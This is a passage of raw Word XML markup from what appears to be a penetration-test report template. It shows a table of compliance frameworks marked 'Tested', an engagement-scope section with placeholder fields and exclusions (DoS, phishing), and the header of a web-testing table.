          <w:p w14:paraId="306FC6C0" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="10B19CDD" w14:textId="77777777" w:rsidTr="00E40E14">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="6C513C99" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>National Institute of Standards and Technology (NIST) Cybersecurity Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="038E99DE" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="65DFC7CE" w14:textId="77777777" w:rsidTr="00E40E14">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="08DB7B24" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>Control Objectives for Information and Related Technologies (COBIT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="670FD809" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="587970CE" w14:textId="77777777" w:rsidTr="00E40E14">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="55011150" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>Gramm-Leach-Bliley Act (GLBA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2501FDFC" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="3348F923" w14:textId="77777777" w:rsidTr="00E40E14">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="45E97AE2" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>California Consumer Privacy Act (CCPA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="291C0718" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="4AF86B6E" w14:textId="77777777" w:rsidTr="00E40E14">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="118A9041" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>SOC 2 (System and Organization Controls)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0BCCCD9B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:t>Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68C44AE9" w14:textId="098FFF5B" w:rsidR="00112BBC" w:rsidRPr="008A1DB6" w:rsidRDefault="00112BBC" w:rsidP="008A1DB6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="engagement-scope-1"/>
      <w:bookmarkStart w:id="36" w:name="engagement-scope"/>
      <w:bookmarkStart w:id="37" w:name="_Toc178498968"/>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidRPr="008A1DB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Engagement Scope</w:t>
      </w:r>
      <w:r w:rsidR="008A1DB6" w:rsidRPr="008A1DB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="4D7AB219" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="general"/>
      <w:r w:rsidRPr="00E40E14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>General</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770F40AC" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="004565AB" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="39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762"/>
        <w:gridCol w:w="5550"/>
      </w:tblGrid>
      <w:tr w:rsidR="00112BBC" w14:paraId="6B548420" w14:textId="77777777" w:rsidTr="00EA00E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shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="1F30ED4A" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Subnets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3795" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="330BEB74" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[Insert Subnets]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="1AE0AC88" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="245DA84D" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="380E625F" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[Insert Hosts]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="50510304" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="3847A4F7" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2F905D1E" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[Insert Applications]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="2CAD1929" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="4EED965B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0BADFC1A" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[Insert Servers]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="731E245F" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="07AAF7B7" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scope Exclusions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3795" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="44EDD556" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E40E14">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>- Denial of Service (</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E40E14">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DoS)  -</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E40E14">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Phishing/Social Engineering (Per client request, not performed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6666526F" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="00F82E5A" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="web"/>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="79A34AC8" w14:textId="1172BE94" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="000479B0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E40E14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="52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104"/>
        <w:gridCol w:w="756"/>
        <w:gridCol w:w="586"/>
        <w:gridCol w:w="922"/>
        <w:gridCol w:w="734"/>
        <w:gridCol w:w="1025"/>
        <w:gridCol w:w="1078"/>
        <w:gridCol w:w="900"/>
        <w:gridCol w:w="1117"/>
        <w:gridCol w:w="838"/>
        <w:gridCol w:w="838"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E40D61" w14:paraId="6F965F58" w14:textId="77777777" w:rsidTr="00E40D61">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="657"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1104" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="0878CFC6" w14:textId="77777777" w:rsidR="00E40D61" w:rsidRPr="008C677D" w:rsidRDefault="00E40D61" w:rsidP="00E40D61">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>Engagement Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="756" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="1DC78ED0" w14:textId="77777777" w:rsidR="00E40D61" w:rsidRPr="008C677D" w:rsidRDefault="00E40D61" w:rsidP="00E40D61">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t xml:space="preserve">Scope APPs /(URLs)/IPs  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="586" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="0BBE77AA" w14:textId="77777777" w:rsidR="00E40D61" w:rsidRPr="008C677D" w:rsidRDefault="00E40D61" w:rsidP="00E40D61">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>Audit/Test Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="922" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="25016DC8" w14:textId="77777777" w:rsidR="00E40D61" w:rsidRPr="008C677D" w:rsidRDefault="00E40D61" w:rsidP="00E40D61">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>Operating System(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="734" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="42DD4DE6" w14:textId="77777777" w:rsidR="00E40D61" w:rsidRPr="008C677D" w:rsidRDefault="00E40D61" w:rsidP="00E40D61">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>Doman Names</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1025" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="3F024BE5" w14:textId="77777777" w:rsidR="00E40D61" w:rsidRPr="008C677D" w:rsidRDefault="00E40D61" w:rsidP="00E40D61">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>Client Awareness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1078" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="562653C7" w14:textId="77777777" w:rsidR="00E40D61" w:rsidRPr="008C677D" w:rsidRDefault="00E40D61" w:rsidP="00E40D61">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>Deployment Development Stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="1768CCFE" w14:textId="76FF2531" w:rsidR="00E40D61" w:rsidRPr="008C677D" w:rsidRDefault="00E40D61" w:rsidP="00E40D61">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>Login Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1117" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="2A8CDBA1" w14:textId="77777777" w:rsidR="00E40D61" w:rsidRPr="008C677D" w:rsidRDefault="00E40D61" w:rsidP="00E40D61">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>Functionalities Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="838" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="78D28188" w14:textId="77777777" w:rsidR="00E40D61" w:rsidRPr="008C677D" w:rsidRDefault="00E40D61" w:rsidP="00E40D61">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>Start Grade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="838" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="3EC03AA3" w14:textId="77777777" w:rsidR="00E40D61" w:rsidRPr="008C677D" w:rsidRDefault="00E40D61" w:rsidP="00E40D61">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>Closure Grade</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="1114D500" w14:textId="77777777" w:rsidTr="00E40D61">
        <w:trPr>
          <w:trHeight w:val="1595"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1104" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76D4B4E4" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Insert Audit Type: Security Audit, Vulnerability Assessment, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="592C8DD5" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>[Insert URL or Target System]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="586" w:type="dxa"/>
          </w:tcPr>
